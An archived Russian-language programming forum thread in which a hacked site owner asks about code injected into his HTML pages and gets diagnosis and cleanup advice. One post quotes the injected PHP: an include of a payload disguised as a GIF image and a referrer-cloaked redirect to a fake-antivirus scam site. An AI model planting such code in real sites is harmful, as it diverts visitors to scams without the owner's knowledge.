| Версия для печати темы
Нажмите сюда для просмотра этой темы в оригинальном формате |
| Форум программистов > PHP: Общие вопросы > На html-страницах появился этот код |
| Автор: Chai 10.4.2013, 06:51 | ||||
Загружал уже давно в контент своего сайта обычные html-страницы. Решил пройтись с проверкой по контенту, смотрю, некоторые страницы были недавно изменены (по дате модификации выявил), а в конце (еще в теле, в самом конце) добавлены такие строки:
Кроме того, на сервер мне закинули директорию со страницами, раздающими некие сломанные программы) crack android navitel 5 5 crack cs4 illustrator crack finereader 10 crack genius driver И как часто сейчас встречаешь, типичные "комменты счастливых юзверей", вроде как А зачем при скачивании файла просит ввести номер? Это бесплатно!? Той же датой создания/модификации в корне лежал скриптовый файл *.js
Довески убрал, но чо за код был в конце страниц, что он делает? Может, где еще проверить надо? И какие функции выполнял скриптовый файл? Я хочу выяснить, может, еще кто проник, кто за свой собственный хостинг платить не хочет? |
| Автор: Чучмек 10.4.2013, 11:13 |
| Chai, тебя взломали. Проверяет откуда был переход - если переход был и не со страницы твоего сайта - перекидывает на base-file |
| Автор: Chai 10.4.2013, 19:47 |
| А почему им так важно, чтобы переход был не со страниц моего сайта? Что за ребятки эти? Здесь http://labs.sucuri.net/?details=base-file.com. Так что я прям боюсь перейти, чтобы на них полюбоваться. Добавлено через 3 минуты и 44 секунды Блин, буду писать гневное письмо хостеру, что его антивирь, которым он регулярно проверяет контент, в упор не видит ни редиректов в хтакцессе, ни в этих довесках. |
| Автор: Sanchezzz 10.4.2013, 19:57 |
| Ну скорее всего он ответит что у вас дрявые скрипты. |
| Автор: Chai 10.4.2013, 20:06 |
| Хех, там из скриптов есть только классический phpBB3. На эту отмазку напишу ихнему главному. Им уже написал. Зачем нужна такая проверка, если она не находит эти гадости? Чем они проверяют, не знаю, а только один раз нашли PHP-вирус, а эти не находят. А ведь достаточно посмотреть в блэклисты, они не скрываются. |
| Автор: Чучмек 10.4.2013, 20:45 |
Чтобы ты не догадался. Если вести адрес в браузер и переходить со страницы на страницу - все Ок. А если перейти на твой сайт по внешней ссылке,с поисковика например, то перекинет. Добавлено через 3 минуты и 15 секунд А че боятся? Компьютер не взорвется. Говорят у вас типа вирусы и предлагают проверить комп за SMS. |
| Автор: Sanchezzz 10.4.2013, 23:15 |
| Чаще и за дырок форумов и закачивают шелы, особенно если они крякнутые=). |
| Автор: Chai 11.4.2013, 06:53 |
| Щас набрал в браузере адрес одной из страниц сайта и выполнил переход на нее. Как она выглядит запечатлел во вложении, а код внизу нее такой <? require_once($_SERVER['DOCUMENT_ROOT'].'/group/case/mn_t.gif'); ?> <? if(isset($_SERVER['HTTP_REFERER']) && !preg_match("|^http://$_SERVER[HTTP_HOST]|i", $_SERVER['HTTP_REFERER'])){ exit( '<script>setTimeout(\'document.location.href = "http://base-file.com/antivirus"\', 3000);</script>'); } ?></body> </html> Переход на base-file.com почему-то не выполнился. Почему? |
| Автор: krypt3r 11.4.2013, 07:10 | ||
Кто крякнутый? Шелл или бесплатный phpBB? |
| Автор: MoLeX 11.4.2013, 07:34 |
| видно же что js скрипт не сработал. |
| Автор: Sanchezzz 11.4.2013, 10:40 |
| Это в общем плане вы используете то что используют очень большое количество людей, каждая дырка даже в бесплатном форуме это угроза всему сайту. Платные формы или крякнутые имеют уйму дыр. |
| Автор: Chai 11.4.2013, 15:15 | ||
А, точно, я ж его прибил в корне еще ранее. Мне щас коллега сказал, что на его форум новый юзер поимел права админа, потому что зашел в браузере в каком-то лине. Форум от SMF. Как это может быть, в линях что-то иначе исполняется? |
| Автор: Aliance 11.4.2013, 18:34 |
в чем? |
| Автор: Chai 11.4.2013, 19:28 |
| В линуксе. |
| Автор: MoLeX 12.4.2013, 05:35 |
| )))))) взлом сайта через линкус. забавно |
| Автор: Chai 17.4.2013, 11:29 |
| Скорее всего троян сидит. Ходил на сайты, которые заражены HEUR:Trojan.Script.Generic или чем-то аналогичным. Выкачал весь htdocs на локальный комп с Каспервычем, но он вирусни не нашел. Или это результат удаление .js, или касперыч видит лишь работу в браузере. |
| Автор: cia 17.4.2013, 13:10 |
| Вирус - это и есть js-код. |
| Автор: Arantir 17.4.2013, 13:55 |
| Chai, почитайте про то, что такое вирусы, и о том, как работают антивирусы. А то из ваших постов создается ощущение, что вы живете в сказочном мире, где есть только черное и белое. php и js — это скриптовые языки, для них "антивирусы" не помогут. По сути, все, что не задумано разработчиком прямо или косвенно, — вредоностный код. Но откуда антивирусу знать, влепил ли этот код сюда какой-то школьник-хакер или сам разработчик? Можно сделать бесконечный append пары строчек текста и от этого половина браузеров просто умрет при открытии сайта. Но вирусом это никогда не назовут. Никакая программа не заменит собственного мозга. Сделайте себе cron на проверку измения в файлах и просматривайте отчеты, а при потребности — изменения в файлах, сделанные не вами, если такие произойдут. В частности, настораживают вопросы на подобии Безусловно, человек и не может и не обязан знать все. Но, если вы решили вдаться в веб, то вам нужно заполнить очень много пробелов в своих познаниях в этой сфере. Если вы от этого далеки и вам просто нужен сайт — наймите для этого соответствующего специалиста. Ибо для новичка веб — это как поле граблей. |
| Автор: Chai 18.4.2013, 07:05 | ||||||
| cia Вирус - это и есть js-код. ___________ Удаленный файл .js был "штатным" файлом сайта. По дате его модификации я увидел, что кто-то в нем покопался, и все, что я смог увидеть инородного, это все тот же код
Вот весь файл
Как я понимаю, это форма поиска. Какой же кусок в нем имел критическое значение для исполнения всех зловредных инструкций на статических страницах контента? Добавлено через 4 минуты и 30 секунд
Я уже начал исполнять Ваши рекомендации. |
| Автор: Chai 18.4.2013, 11:03 | ||
Насколько я понимаю, мне, как пользователю *nux, на сервере доступна только моя домашняя директория или пространство, к которому хостер-админ предоставил мне права доступа. Есть ли у меня доступ к демону cron, его настройкам и расписанию? |
| Автор: s0lman 18.4.2013, 11:09 |
| В админпанели должен быть крон доступен |
| Автор: Arantir 18.4.2013, 12:11 | ||
Кажется, я только сейчас заметил, что кул-хацкер пытается добавить php-код с помощью JavaScript. lol... На что надеялся тот, кто добавлял эти "зловредные" строчки? На то, что по стечению обстоятельств и настроек сервера в js-файлах исполняется php-код? У пользователя он то уж точно не выполнится.
Вы слишком узко смотрите на проблему. А если ваш сайт и есть блэк-лист? Антивирус его тогда вообще с концами удалить должен из-за кучи ссылок на вредные сайты... В блэк-листах есть самые разнообразные сайты. В том числе клоны, фишинговые и т.п. Может вы просто разместили у себя ссылку на клон своего сайта с предупреждением о том, что это подделка под ваш сайт и призываете посетителей не пользоваться таким сайтом. Ссылка — это всего лишь ссылка. Антивирус ничего не обязан с ней делать. |